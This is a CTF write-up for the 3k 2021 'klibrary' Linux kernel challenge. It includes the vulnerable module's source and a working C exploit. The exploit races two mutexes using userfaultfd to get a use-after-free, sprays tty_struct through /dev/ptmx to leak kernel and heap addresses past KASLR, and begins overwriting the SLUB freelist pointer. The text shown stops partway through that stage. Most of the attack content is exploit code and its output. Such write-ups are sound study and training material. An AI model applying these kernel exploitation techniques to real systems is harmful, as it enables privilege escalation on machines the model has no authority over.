Exploit linux kernel use after free with a race condition.
You can also read the writeup here: https://meowmeowxw.gitlab.io/ctf/3k-2021-klibrary/
Store your books safely inside the kernel!
nc klibrary.2021.3k.ctf.to 9994
This is a linux kernel pwn challenge. We have:
- bzImage -> This is the linux kernel image
- initramfs.cpio -> This is the compressed file system
- src/library.c -> This is the source code of the custom kernel module
- start.sh -> This is the qemu script to run the kernel image
To extract the filesystem use:
mkdir initramfs
cd initramfs
cpio -i < ../initramfs.cpio
Inside we can find the init
file and the custom kernel module library.ko
.
To compress the filesystem with cpio:
cd ./initramfs
find . | cpio -o -H newc > ../initramfs1.cpio
cd ../
To start the os as root you need to edit initramfs/init
:
setsid cttyhack setuidgid 0 sh
# setsid cttyhack setuidgid 1000 sh
I modified the start.sh
to compile my exploit, compress the filesystem, disable kaslr
and start qemu in debug mode:
#!/bin/sh
# Build the exploit as a static, non-PIE binary directly into the unpacked
# initramfs so that it is available inside the guest.
gcc -g -static ./exploit.c -o ./initramfs/exploit -lpthread -no-pie
# Repack the filesystem (newc cpio format) under a new name, leaving the
# original initramfs.cpio untouched.
cd ./initramfs
find . | cpio -o -H newc > ../initramfs1.cpio
cd ../
# Boot the challenge kernel with the repacked initramfs. Compared with the
# stock script described in the writeup, "nokaslr" is appended to the kernel
# command line and "-s" is passed to qemu (the writeup's "debug mode").
exec qemu-system-x86_64 \
-m 128M \
-nographic \
-kernel "./bzImage" \
-append "console=ttyS0 loglevel=3 oops=panic panic=-1 pti=on nokaslr" \
-no-reboot \
-cpu qemu64,+smep,+smap \
-monitor /dev/null \
-initrd "./initramfs1.cpio" \
-smp 2 \
-smp cores=2 \
-smp threads=1 \
-s
The active kernel protections are:
- KASLR
- SMEP -> You can't execute shellcode in user-space when the cpu is in kernel mode/ring 0
- SMAP -> You can't access page in user-space when the cpu is in kernel mode (it's harder to rop)
- KPTI -> Separate kernel-space from user-space page tables
You can extract the bzImage
with https://raw.githubusercontent.com/torvalds/linux/master/scripts/extract-vmlinux.
After that I use https://github.com/marin-m/vmlinux-to-elf to export the symbols
inside the kernel's elf image to use during debugging.
library.c
:
#include <linux/kernel.h>
#include <linux/fs.h>
#include <linux/mutex.h>
#include <linux/slab.h>
#include <linux/module.h>
#include <linux/uaccess.h>
#include <linux/device.h>
#define DEVICE_NAME "library"
#define CLASS_NAME "library"
#define BOOK_DESCRIPTION_SIZE 0x300
#define CMD_ADD 0x3000
#define CMD_REMOVE 0x3001
#define CMD_REMOVE_ALL 0x3002
#define CMD_ADD_DESC 0x3003
#define CMD_GET_DESC 0x3004
static DEFINE_MUTEX(ioctl_lock);
static DEFINE_MUTEX(remove_all_lock);
MODULE_AUTHOR("MaherAzzouzi");
MODULE_DESCRIPTION("A library implemented inside the kernel.");
MODULE_LICENSE("GPL");
static int major;
static long library_ioctl(struct file* file, unsigned int cmd, unsigned long arg);
static int library_open(struct inode* inode, struct file *filp);
static int library_release(struct inode* inode, struct file *filp);
/*
 * File operations of the "library" character device. Every command goes
 * through library_ioctl(); open and release only log (release also frees
 * the whole book list).
 */
static struct file_operations library_fops = {
.owner = THIS_MODULE,
.unlocked_ioctl = library_ioctl,
.open = library_open,
.release = library_release
};
static struct class* library_class = NULL;
static struct device* library_device = NULL;
/*
 * One node of the global doubly linked list of books. `root` points at the
 * first node, or is NULL when the list is empty.
 */
struct Book {
/* Fixed-size description buffer, copied to/from user space as a whole. */
char book_description[BOOK_DESCRIPTION_SIZE];
/* Caller-supplied identifier used to look the book up. */
unsigned long index;
/* Next node in the list; add_book() sets it to NULL for the last node. */
struct Book* next;
/* Previous node in the list, as linked by add_book(). */
struct Book* prev;
} *root;
/*
 * Argument block passed from user space with every ioctl; library_ioctl()
 * copies it in before dispatching.
 */
struct Request {
/* Index of the book the command operates on. */
unsigned long index;
/* User buffer of BOOK_DESCRIPTION_SIZE bytes for CMD_ADD_DESC / CMD_GET_DESC. */
char __user * userland_pointer;
};
unsigned long counter = 1;
static int add_book(unsigned long index);
static int remove_book(unsigned long index);
static noinline int remove_all(void);
static int add_description_to_book(struct Request request);
static int get_book_description(struct Request request);
/*
 * open() handler for the device node.
 *
 * Only logs a banner; no per-file state is created. Always returns 0.
 */
static int library_open(struct inode* inode, struct file *filp)
{
    printk(KERN_INFO "[library] : manage your books safely here!\n");

    return 0;
}
/*
 * release() handler for the device node.
 *
 * Logs a message and frees the whole (global) book list. Note that
 * remove_all() is called here without taking either ioctl_lock or
 * remove_all_lock. Always returns 0.
 */
static int library_release(struct inode* inode, struct file *filp)
{
    printk(KERN_INFO "[library] : vulnerable device closed! try harder.\n");

    remove_all();

    return 0;
}
/*
 * ioctl entry point: copies a struct Request from user space and dispatches
 * on `cmd`.
 *
 * Returns -1 if the request cannot be copied in, 0 otherwise. The return
 * values of the individual handlers are discarded, so a failed command still
 * yields 0. Unknown commands are silently ignored.
 *
 * NOTE(review): CMD_REMOVE_ALL is serialized with remove_all_lock while every
 * other command is serialized with ioctl_lock. The two mutexes are
 * independent, so remove_all() can run while another handler is still using
 * a Book it looked up in the list.
 */
static long library_ioctl(struct file* file, unsigned int cmd, unsigned long arg) {
struct Request request;
/* The request is copied in for every command, including CMD_REMOVE_ALL. */
if(copy_from_user((void*)&request, (void*)arg, sizeof(struct Request))) {
return -1;
}
if(cmd == CMD_REMOVE_ALL) {
/* Protected by its own mutex, not by ioctl_lock. */
mutex_lock(&remove_all_lock);
remove_all();
mutex_unlock(&remove_all_lock);
} else {
mutex_lock(&ioctl_lock);
switch(cmd) {
case CMD_ADD:
add_book(request.index);
break;
case CMD_REMOVE:
remove_book(request.index);
break;
case CMD_ADD_DESC:
add_description_to_book(request);
break;
case CMD_GET_DESC:
get_book_description(request);
break;
}
mutex_unlock(&ioctl_lock);
}
return 0;
}
/*
 * Append a new, zero-initialised book with the given index to the list.
 *
 * Refuses once `counter` has reached 10 (the counter starts at 1).
 * Duplicate indices are not rejected.
 *
 * Returns 0 on success, -1 when the limit is reached or allocation fails.
 */
static int add_book(unsigned long index)
{
    struct Book *node;
    struct Book *tail;

    if (counter >= 10) {
        printk(KERN_INFO "[library] can only hold 10 books here\n");
        return -1;
    }

    node = (struct Book *)kzalloc(sizeof(struct Book), GFP_KERNEL);
    if (!node) {
        printk(KERN_INFO "[library] : allocation failed! \n");
        return -1;
    }

    node->index = index;
    node->next = NULL;

    if (!root) {
        /* First book: it becomes the head of the list. */
        node->prev = NULL;
        root = node;
    } else {
        /* Walk to the current last node and link the new one after it. */
        for (tail = root; tail->next != NULL; tail = tail->next)
            ;
        node->prev = tail;
        tail->next = node;
    }

    counter++;
    return 0;
}
/*
 * Unlink and free the first book whose index matches.
 *
 * Fixes over the previous version:
 *  - an unknown index now returns -1 instead of dereferencing a NULL node;
 *  - removing the last node no longer writes through a NULL `next`;
 *  - when the head is removed, the new head's `prev` is reset to NULL
 *    instead of being left pointing at the freed node.
 *
 * Returns 0 when a book was removed, -1 when the list is empty or no book
 * has the requested index (the counter is only decremented on success).
 */
static int remove_book(unsigned long index)
{
    struct Book *p;

    if (root == NULL) {
        printk(KERN_INFO "[library] : no books in the library yet.");
        return -1;
    }

    /* Find the first node carrying the requested index. */
    for (p = root; p != NULL && p->index != index; p = p->next)
        ;

    if (p == NULL) {
        printk(KERN_INFO "[library] : can't remove %lu reason : not found\n", index);
        return -1;
    }

    /* Detach from the predecessor, or move the head if p is the first node. */
    if (p == root)
        root = p->next;
    else
        p->prev->next = p->next;

    /* Detach from the successor, if there is one. */
    if (p->next != NULL)
        p->next->prev = (p->prev != NULL && root != p->next) ? p->prev : NULL;

    kfree(p);
    counter--;
    return 0;
}
/*
 * Free every book in the list and reset the module state.
 *
 * After the walk, `root` is NULL and `counter` is back to its initial
 * value of 1. Takes no lock itself; callers decide which one to hold.
 * Always returns 0.
 */
static noinline int remove_all(void)
{
    struct Book *cur = root;

    while (cur != NULL) {
        /* Read the link before the node is released. */
        struct Book *following = cur->next;

        kfree(cur);
        cur = following;
    }

    root = NULL;
    counter = 1;

    return 0;
}
/*
 * Copy BOOK_DESCRIPTION_SIZE bytes from request.userland_pointer into the
 * description of the first book whose index equals request.index.
 *
 * Returns 0 on success and -1 when the list is empty, the index is unknown
 * or the user copy fails. (The previous version fell off the end of this
 * non-void function on success.)
 */
static int add_description_to_book(struct Request request)
{
    struct Book *book = root;

    if (book == NULL) {
        printk(KERN_INFO "[library] : no books in the library yet.\n");
        return -1;
    }

    while (book != NULL && book->index != request.index)
        book = book->next;

    if (book == NULL) {
        printk(KERN_INFO "[library] : the given index wasn't found\n");
        return -1;
    }

    /* The copy can sleep on a user page fault while `book` is still in use. */
    if (copy_from_user((void *)book->book_description,
                       (void *)(request.userland_pointer),
                       BOOK_DESCRIPTION_SIZE)) {
        printk(KERN_INFO "[library] : copy_from_user failed for some reason.\n");
        return -1;
    }

    return 0;
}
/*
 * Copy the BOOK_DESCRIPTION_SIZE-byte description of the first book whose
 * index equals request.index out to request.userland_pointer.
 *
 * Returns 0 on success and -1 when the list is empty, the index is unknown
 * or the user copy fails. (The previous version fell off the end of this
 * non-void function on success.)
 */
static int get_book_description(struct Request request)
{
    struct Book *book = root;

    if (book == NULL) {
        printk("[library] : no books yet, can not read the description.\n");
        return -1;
    }

    while (book != NULL && book->index != request.index)
        book = book->next;

    if (book == NULL) {
        printk(KERN_INFO "[library] : no book with the index you provided\n");
        return -1;
    }

    /* The copy can sleep on a user page fault while `book` is still in use. */
    if (copy_to_user((void *)request.userland_pointer,
                     (void *)book->book_description,
                     BOOK_DESCRIPTION_SIZE)) {
        printk("[library] : copy_to_user failed!\n");
        return -1;
    }

    return 0;
}
/*
 * Module init: register the character device, create its class and device
 * node.
 *
 * Changes over the previous version:
 *  - failures now propagate the real error code (the negative value from
 *    register_chrdev() or PTR_ERR() of the failed object) instead of -1;
 *  - the mutex_init() calls are gone: both mutexes are defined with
 *    DEFINE_MUTEX and were being re-initialised after the device node was
 *    already visible;
 *  - the list head is reset before the device is registered, not after.
 *
 * Returns 0 on success or a negative errno.
 */
static int __init init_library(void)
{
    int err;

    root = NULL;

    major = register_chrdev(0, DEVICE_NAME, &library_fops);
    if (major < 0)
        return major;

    library_class = class_create(THIS_MODULE, CLASS_NAME);
    if (IS_ERR(library_class)) {
        err = PTR_ERR(library_class);
        goto out_chrdev;
    }

    library_device = device_create(library_class,
                                   NULL,
                                   MKDEV(major, 0),
                                   NULL,
                                   DEVICE_NAME);
    if (IS_ERR(library_device)) {
        err = PTR_ERR(library_device);
        goto out_class;
    }

    printk(KERN_INFO "[library] : started!\n");
    return 0;

out_class:
    class_destroy(library_class);
out_chrdev:
    unregister_chrdev(major, DEVICE_NAME);
    return err;
}
/*
 * Module exit: tear down the device node, the class and the chrdev
 * registration, in the reverse order of init_library().
 *
 * The class is released with class_destroy() only; the previous version
 * called class_unregister() first, which unregistered the class twice.
 */
static void __exit exit_library(void)
{
    device_destroy(library_class, MKDEV(major, 0));
    class_destroy(library_class);
    unregister_chrdev(major, DEVICE_NAME);

    mutex_destroy(&ioctl_lock);
    mutex_destroy(&remove_all_lock);

    printk(KERN_INFO "[library] : finished!\n");
}
module_init(init_library);
module_exit(exit_library);
To communicate with the kernel module we need to use ioctl. The module has a double linked list called root:
struct Book {
char book_description[BOOK_DESCRIPTION_SIZE];
unsigned long index;
struct Book* next;
struct Book* prev;
} *root;
We can interact with the module with 5 commands:
- CMD_ADD(index) -> add book to the list and set the specified index
- CMD_REMOVE(index) -> remove book from the list
- CMD_ADD_DESC(index, buffer) -> copy userspace buffer inside
book_description
- CMD_GET_DESC(index, buffer) -> copy to userspace buffer the content of
book_description
- CMD_REMOVE_ALL() -> kfree all the book
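We can have at most 9 books inside the list: the module's message says 10, but counter starts at 1 and add_book refuses once it reaches 10.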
if(cmd == CMD_REMOVE_ALL) {
mutex_lock(&remove_all_lock);
remove_all();
mutex_unlock(&remove_all_lock);
} else {
mutex_lock(&ioctl_lock);
switch(cmd) {
case CMD_ADD:
add_book(request.index);
break;
case CMD_REMOVE:
remove_book(request.index);
break;
case CMD_ADD_DESC:
add_description_to_book(request);
break;
case CMD_GET_DESC:
get_book_description(request);
break;
}
mutex_unlock(&ioctl_lock);
}
The vulnerability is easy to spot if you're familiar with this kind of challenge.
The module uses two separate mutex_lock
to handle commands, so we can trigger a race condition:
- one thread add the description and another does the kfree of the list -> Use-After-Free (write)
- one thread get the description and another does the kfree of the list -> Use-After-Free (read)
SLUB is the default allocator of the linux kernel, of course it's not easy to understand the inner workings but there are some nice introductions on the internet:
- https://github.com/PaoloMonti42/salt/blob/master/docs/0x00_SLUB_refresher.md
- https://ruffell.nz/programming/writeups/2019/02/15/looking-at-kmalloc-and-the-slub-memory-allocator.html
- https://hammertux.github.io/slab-allocator
- Read the source code
To keep things simple: there are different freelists of free objects, one per object size,
and there are dedicated lists that contain only specific objects (e.g. the task_struct of every process).
You can find the freelist with: cat /proc/slabinfo
The freelist are simple linked-list with the next pointer that points to next free object.
On the implementation of SLUB there are two protections that luckily for us weren't
enabled on this challenge(in reality only one would have been a bit tedious):
- CONFIG_SLAB_FREELIST_HARDENED -> encrypt the next pointer with: xor of a random value xor address of the pointer bswapped (swap endianess, in a way similar to glibc 2.32 ptr protection)
- CONFIG_SLAB_FREELIST_RANDOM -> randomize the order of the freelist, by default the freed objects available are "ordered" from the lowest to highest address
Since our book struct occupies 0x318=792 bytes the kernel will get a freed object from a kmalloc-1024 list.
Spawning two threads that try to trigger the race condition is not optimal: we have a low probability of success. Luckily for us, userfaultfd exists, which can be used to register a routine that handles a page fault in userspace:
https://blog.lizzie.io/using-userfaultfd.html
With this technique we can arbitrarily stop kernel code execution when the kernel tries to execute
copy_from_user(dest, uf_page, ...)
or copy_to_user(uf_page, src, ...)
where uf_page
is a mmaped
address in user space registered with userfaultfd by us.
So we can effectively stop during add_description_to_book
and get_book_description
to
execute remove_all
and trigger the UAF.
The first thing we have to do is to leak addresses to defeat KASLR. In linux kernel heap exploitation there are various techniques, the most used is to use some syscall to tell the kernel to allocate indirectly some structs, if we have a UAF we can then read/write to this struct to get an arb read/write or rip control.
- I free a book in address 0xaa00
- syscall(something) -> trigger kmalloc -> return 0xaa00
For a list of useful structs:
- https://ptr-yudai.hatenablog.com/entry/2020/03/16/165628
- www.personal.psu.edu/yxc431/publications/SLAKE.pdf
For kmalloc-1024 the most used structure is tty_struct
that we can use to achieve arbitrary read/write and RIP control. To allocate the
structure we just need to execute ptmx = open("/dev/ptmx", O_RDWR | O_NOCTTY);
The strategy is to:
Thread 1 | Thread 2 |
---|---|
allocate a book 0 | idle |
register ufd to address XYZ | idle |
get_book_description(dest=XYZ) --> STOP execution here | page fault |
idle | remove_all |
idle | open("/dev/ptmx") |
idle | return |
finish copy_to_user with leaked tty_struct | ended |
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <inttypes.h>
#include <sys/ioctl.h>
#include <sys/msg.h>
#include <sys/shm.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <linux/userfaultfd.h>
#include <sys/resource.h>
#include <pthread.h>
#include <sys/mman.h>
#include <poll.h>
#include <time.h>
#include <unistd.h>
#define DEVICE_NAME "/dev/library"
#define BOOK_DESCRIPTION_SIZE 0x300
#define CMD_ADD 0x3000
#define CMD_REMOVE 0x3001
#define CMD_REMOVE_ALL 0x3002
#define CMD_ADD_DESC 0x3003
#define CMD_GET_DESC 0x3004
#define PAGESIZE 0x1000
int ioctl_add(uint64_t id);
int ioctl_remove(uint64_t id);
int ioctl_add_desc(uint64_t id, uint8_t *buffer);
int ioctl_get_desc(uint64_t id, uint8_t *buffer);
int _ioctl_get_desc(uint64_t id, uint8_t *buffer);
int ioctl_remove_all();
void leak_heap();
void write_next_ptr();
void *race_userfault(void (*func)());
int userfaultfd(int flags);
int register_ufd(uint64_t page);
void print_leak(uint64_t *ptr, int size);
void get_rax();
typedef struct {
uint64_t index;
uint8_t *ptr;
} request_t;
typedef struct {
uint64_t index;
void *next;
void *prev;
} book_details;
uint64_t kbase = 0x0L,
heap_ptr = 0x0L;
int fd, ufd, ret, ptmx;
uint64_t uf_page, rax = 0, leak[BOOK_DESCRIPTION_SIZE];
const char cat[] = {0xf0, 0x9f, 0x90, 0x88, '\0'};
const char shark[] = {0xF0, 0x9F, 0xA6, 0x88, '\0'};
const char dice[] = {0xF0, 0x9F, 0x8E, 0xB2, '\0'};
const char alien[] = {0xF0, 0x9F, 0x91, 0xBE, '\0'};
const char ghost[] = {0xF0, 0x9F, 0x91, 0xBB, '\0'};
int main(int argc, char **argv) {
uint8_t *buf = calloc(BOOK_DESCRIPTION_SIZE, 1);
pthread_t th;
fd = open(DEVICE_NAME, O_RDONLY);
printf("[%s] fd: %d\n", alien, fd);
ioctl_add(0);
// 1st stage: LEAK KBASE AND KHEAP
ufd = register_ufd(0xaaa000);
printf("[%s] registered ufd: %d\t @ 0x%lx\n", shark, ufd, uf_page);
pthread_create(&th, NULL, (void *)race_userfault, leak_heap);
_ioctl_get_desc(0, (uint8_t *)0xaaa000);
kbase = leak[66] - 0x14fc00;
heap_ptr = leak[8] - 0x38;
printf("\n");
printf("[%s] kbase: 0x%016lx\n", ghost, kbase);
close(ptmx);
return 0;
}
int ioctl_add(uint64_t id) {
request_t arg = {
.index = id,
.ptr = NULL
};
printf("[*] ioctl_add[%ld]\n", id);
ret = ioctl(fd, CMD_ADD, &arg);
if (ret != 0) {
printf("[!] ioctl_add ret: %d\t id: %ld\n", ret, id);
}
return 0;
}
/*
 * Issue CMD_REMOVE for book `id` on the global device fd.
 *
 * The request structure is now what gets passed to the kernel. The previous
 * version built `arg` but passed `&id`, so the module's
 * copy of sizeof(struct Request) bytes read past the 8-byte `id`.
 *
 * The ioctl result is stored in the global `ret` and reported when it is
 * non-zero; the function itself always returns 0.
 */
int ioctl_remove(uint64_t id) {
    request_t arg = {
        .index = id,
        .ptr = NULL
    };

    printf("[*] ioctl_remove[%ld]\n", id);
    ret = ioctl(fd, CMD_REMOVE, &arg);
    if (ret != 0) {
        printf("[!] ioctl_remove ret: %d\t id: %ld\n", ret, id);
    }
    return 0;
}
int ioctl_add_desc(uint64_t id, uint8_t *buffer) {
request_t arg = {
.index = id,
.ptr = buffer
};
printf("[*] ioctl_add_desc[%ld]\n", id);
ret = ioctl(fd, CMD_ADD_DESC, &arg);
if (ret != 0) {
printf("[!] ioctl_add_desc ret: %d\t id: %ld\n", ret, id);
}
return 0;
}
/*
 * Zero `buffer` (BOOK_DESCRIPTION_SIZE bytes) and then fetch the
 * description of book `id` into it via _ioctl_get_desc().
 *
 * Returns whatever _ioctl_get_desc() returns.
 */
int ioctl_get_desc(uint64_t id, uint8_t *buffer) {
    int status;

    /* Clear first so that stale bytes are not mistaken for returned data. */
    memset(buffer, 0, BOOK_DESCRIPTION_SIZE);

    status = _ioctl_get_desc(id, buffer);
    return status;
}
int _ioctl_get_desc(uint64_t id, uint8_t *buffer) {
request_t arg = {
.index = id,
.ptr = buffer
};
printf("[*] ioctl_get_desc[%ld]\n", id);
ret = ioctl(fd, CMD_GET_DESC, &arg);
if (ret != 0) {
printf("[!] ioctl_get_desc ret: %d\t id: %ld\n", ret, id);
}
memcpy(leak, buffer, BOOK_DESCRIPTION_SIZE);
print_leak((uint64_t *)buffer, BOOK_DESCRIPTION_SIZE);
return 0;
}
int ioctl_remove_all() {
request_t arg = {
.index = 0xffffff,
.ptr = NULL
};
printf("[*] ioctl_remove_all\n");
ret = ioctl(fd, CMD_REMOVE_ALL, &arg);
if (ret != 0) {
printf("[!] ioctl_remove_all ret: %d\n", ret);
}
return 0;
}
/*
 * Hex-dump `size` bytes starting at `ptr` as 64-bit words, four words per
 * line, each word followed by a tab. A final newline is always printed.
 * Trailing bytes that do not fill a whole word are ignored.
 */
void print_leak(uint64_t *ptr, int size) {
    const int words = size / 8;
    int idx = 0;

    while (idx < words) {
        printf("0x%016lx\t", ptr[idx]);
        /* Break the line after every fourth word. */
        if (idx % 4 == 3)
            printf("\n");
        idx++;
    }
    printf("\n");
}
/*
 * Map two pages at the fixed address `page` and register the FIRST page
 * with a new userfaultfd for missing-page faults.
 *
 * The second page is deliberately left unregistered so that it can be
 * written from user space without faulting (the later stages of the writeup
 * rely on this). The mapping address is published in the global `uf_page`.
 *
 * Changes over the previous version: the mangled `&reg` argument of
 * UFFDIO_REGISTER is restored, the local descriptor no longer shadows the
 * global `fd`, and the anonymous mapping passes -1 as file descriptor.
 *
 * Returns the userfaultfd descriptor; exits the process on any failure.
 */
int register_ufd(uint64_t page) {
    int uffd;
    struct uffdio_api api = { .api = UFFD_API };

    uf_page = (uint64_t)mmap((void *)page, 0x2000, PROT_READ | PROT_WRITE,
                             MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
    if ((void *)uf_page == MAP_FAILED) {
        perror("mmap uf_page");
        exit(2);
    }

    if ((uffd = userfaultfd(O_NONBLOCK)) == -1) {
        fprintf(stderr, "++ userfaultfd failed: %m\n");
        exit(-1);
    }
    if (ioctl(uffd, UFFDIO_API, &api)) {
        fprintf(stderr, "++ ioctl(fd, UFFDIO_API, ...) failed: %m\n");
        exit(-1);
    }
    if (api.api != UFFD_API) {
        fprintf(stderr, "++ unexepcted UFFD api version.\n");
        exit(-1);
    }

    /* Only the first 0x1000 bytes of the mapping are watched. */
    struct uffdio_register reg = {
        .mode = UFFDIO_REGISTER_MODE_MISSING,
        .range = {
            .start = uf_page,
            .len = 0x1000
        }
    };
    if (ioctl(uffd, UFFDIO_REGISTER, &reg) == -1) {
        fprintf(stderr, "++ ioctl(fd, UFFDIO_REGISTER, ...) failed: %m\n");
        exit(-1);
    }
    return uffd;
}
/*
 * Thread body: wait for a page fault on the global userfaultfd `ufd`, run
 * `func` while the faulting thread is still blocked, then resolve the fault
 * with UFFDIO_COPY and close `ufd`.
 *
 * Only a fault on the first page of `uf_page` triggers `func`; any other
 * event or address aborts the process.
 *
 * Changes over the previous version: the mangled `&copy` argument of
 * UFFDIO_COPY is restored, the page used to resolve the fault is
 * zero-initialised instead of being uninitialised stack memory, and the
 * address check no longer does arithmetic on `void *`.
 *
 * Always returns NULL.
 */
void *race_userfault(void (*func)()) {
    char uf_buffer[0x1000] = {0};
    struct pollfd evt = { .fd = ufd, .events = POLLIN };

    while (poll(&evt, 1, -1) > 0) {
        /* unexpected poll events */
        if (evt.revents & POLLERR) {
            perror("poll");
            exit(-1);
        } else if (evt.revents & POLLHUP) {
            perror("pollhup");
            exit(-1);
        }

        struct uffd_msg fault_msg = {0};
        if (read(ufd, &fault_msg, sizeof(fault_msg)) != sizeof(fault_msg)) {
            perror("read");
            exit(-1);
        }

        char *place = (char *)fault_msg.arg.pagefault.address;
        if (fault_msg.event != UFFD_EVENT_PAGEFAULT
            || (place != (char *)uf_page && place != (char *)uf_page + PAGESIZE)) {
            fprintf(stderr, "unexpected pagefault?.\n");
            exit(-1);
        }

        if (place == (char *)uf_page) {
            printf("[%s] got page fault at address %p, nice!\n", cat, place);
            printf("[%s] call whatever I want\n", cat);
            /* The faulting thread stays blocked until UFFDIO_COPY below. */
            func();
            printf("[%s] done! now releasing ufd to finish exit\n", cat);

            /* release by copying some data to faulting address */
            struct uffdio_copy copy = {
                .dst = (long) place,
                .src = (long) uf_buffer,
                .len = PAGESIZE
            };
            if (ioctl(ufd, UFFDIO_COPY, &copy) < 0) {
                perror("ioctl(UFFDIO_COPY)");
                exit(-1);
            }
            break;
        }
    }

    close(ufd);
    return NULL;
}
/*
 * Thin wrapper around the raw userfaultfd system call.
 *
 * Returns the result of syscall() converted to int.
 */
int userfaultfd(int flags) {
    int result = syscall(SYS_userfaultfd, flags);

    return result;
}
/*
 * Callback run by race_userfault() while the CMD_GET_DESC copy is blocked:
 * free every book, then open /dev/ptmx so that (per the writeup) a
 * tty_struct is allocated in the slot that was just freed. The descriptor
 * is kept in the global `ptmx`.
 */
void leak_heap() {
    ioctl_remove_all();

    ptmx = open("/dev/ptmx", O_RDWR | O_NOCTTY);
}
Output:
[👾] fd: 3
[*] ioctl_add[0]
[🦈] registered ufd: 4 @ 0xaaa000
[*] ioctl_get_desc[0]
[🐈] got page fault at address 0xaaa000, nice!
[🐈] call whatever I want
[*] ioctl_remove_all
[🐈] done! now releasing ufd to finish exit
0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000
0x0000000000000000 0xffff8880070d2038
0xffff8880070d2038 0xffff8880070d2048
0xffff8880070d2048 0xffff88800004e260
0x0000000000000000 0xffff8880070d2068
0xffff8880070d2068 0x0000000000000000
0xffff8880070d2080 0xffff8880070d2080
0x0000000000000000 0xffff8880070d2098
0xffff8880070d2098 0x0000000000000000
0x0000000000000000 0xffff8880070d20b8
0xffff8880070d20b8 0x0000000000000000
0xffff8880070d20d0 0xffff8880070d20d0
0x0000000000000000 0x00000000000000bf
0x010004157f1c0300 0x170f12001a131100
0x0000960000000016 0x0000000000009600
0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000
0x00000000306d7470 0x0000000000000000
0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000
0x0000000000010801 0x0000000000000001
0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000
0x0000000000000000 0xffff8880070d2400
0x0000000000000000 0xffff8880070d21d8
0xffff8880070d21d8 0xffff8880070d21e8
0xffff8880070d21e8 0x0000000fffffffe0
0xffff8880070d2200 0xffff8880070d2200
0xffffffff8114fc00 0xffffc90000091000
0xffff8880001658c0 0xffff88800003eb30
0xffff88800003eb30 0x0000000000000000
0x0000000000000000 0x0000000000000000
0x0000000fffffffe0 0xffff8880070d2258
0xffff8880070d2258 0xffffffff8114ec30
0xffff88800709c600 0x0000000000000000
0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000
[👻] kbase: 0xffffffff81000000
[👾] heap_ptr: 0xffff8880070d2000
For some reason I don't get the first 0x30 bytes of the tty_struct. For example,
at +0x18 there should be the pointer to the virtual table used by the tty.
To get the offsets of the fields of a struct I use pahole
(although the offsets sometimes depend on the compilation flags, etc.). Example:
$ pahole -E tty_struct
struct tty_struct {
int magic; /* 0 4 */
struct kref {
/* typedef refcount_t */ struct refcount_struct {
/* typedef atomic_t */ struct {
int counter; /* 4 4 */
} refs; /* 4 4 */
} refcount; /* 4 4 */
} kref; /* 4 4 */
struct device * dev; /* 8 8 */
struct tty_driver * driver; /* 16 8 */
const struct tty_operations * ops; /* 24 8 */
int index; /* 32 4 */
/* XXX 4 bytes hole, try to pack */
struct ld_semaphore {
/* typedef atomic_long_t -> atomic64_t */ struct {
/* typedef s64 -> __s64 */ long long int counter; /* 40 8 */
...
struct list_head {
struct list_head * next; /* 56 8 */
/* --- cacheline 1 boundary (64 bytes) --- */
struct list_head * prev; /* 64 8 */
} read_wait; /* 56 16 */
struct list_head {
struct list_head * next; /* 72 8 */
struct list_head * prev; /* 80 8 */
...
Anyway, at offsets 56 and 64 there are the next and prev pointers of the read_wait list head
(see the pahole output above). The list is empty, so both point back at the list head itself, i.e. at tty_struct + 0x38.
If we subtract 0x38 we get the address of the tty_struct.
At offset 66*8 we instead have a kernel leak; we just need to subtract a fixed offset
to get the kernel base (verify with grep startup_64 /proc/kallsyms).
I want to know what is the next available objects, so I redo the UAF in read, but
I don't open("/dev/ptmx")
// 2nd stage: LEAK NEXT PTR
// Same read race as stage 1, but the fault handler only calls
// ioctl_remove_all (no /dev/ptmx is opened), so the blocked copy returns
// the contents of the freed object itself.
ioctl_add(0);
ufd = register_ufd(0xbbb000);
printf("registered ufd: %d\t 0x%lx\n", ufd, uf_page);
pthread_create(&th, NULL, (void *)race_userfault, ioctl_remove_all);
_ioctl_get_desc(0, (uint8_t *)0xbbb000);
// Per the writeup, the free-list pointer is found in the middle of the
// object (offset 512) rather than in its first 8 bytes.
next_ptr = leak[512 / 8];
Usually you find the next_ptr in the first 8 bytes of an address, but this time they're in the middle of the chunk (1024/2).
I always get as next_ptr = heap_ptr + 1024
. So this step is skippable but maybe
in irl (non-qemu) it makes sense.
The best scenario is to be able to read/write inside the tty_struct, so we need to have a stable UAF (not one that can only be used during race condition). To do that I used this approach:
Basically I wanted that book1
was at address &book0 + 32
Why ?
Because in this way after a remove(1); open("/dev/ptmx")
with:
- get_book_description(0) -> I can read the tty_struct
- add_description_to_book(0) -> I can overwrite the tty_struct
The +32 is needed to not overwrite the index, next, prev
of book0
, otherwise
we couldn't access book0
if we overwrite book0
with book1
.
We also need luck and hope that tty_struct doesn't overwrite the index of book0
or
we can't access book0
anymore (spoiler: we have luck)
// 3rd stage overwrite next ptr
// Write race: the description copy for book 0 is blocked on the registered
// page while the fault handler frees the list, so the copy lands in the
// freed object.
ioctl_add(0);
ufd = register_ufd(0xccc000);
printf("registered ufd: %d\t 0x%lx\n", ufd, uf_page);
pthread_create(&th, NULL, (void *)race_userfault, ioctl_remove_all);
// The value is placed at uf_page + 0xf00 + 0x200, i.e. in the second,
// unregistered page, so this store does not trigger the fault handler.
((uint64_t *)(uf_page + 0xf00))[512/8] = heap_ptr + 32;
// The source buffer starts inside the registered page, so the kernel copy
// is what faults.
ioctl_add_desc(0, (uint8_t *)0xcccf00);
ioctl_add(0);
memset(buf, 0, BOOK_DESCRIPTION_SIZE);
// Restore the following free-list pointer to the value leaked in stage 2
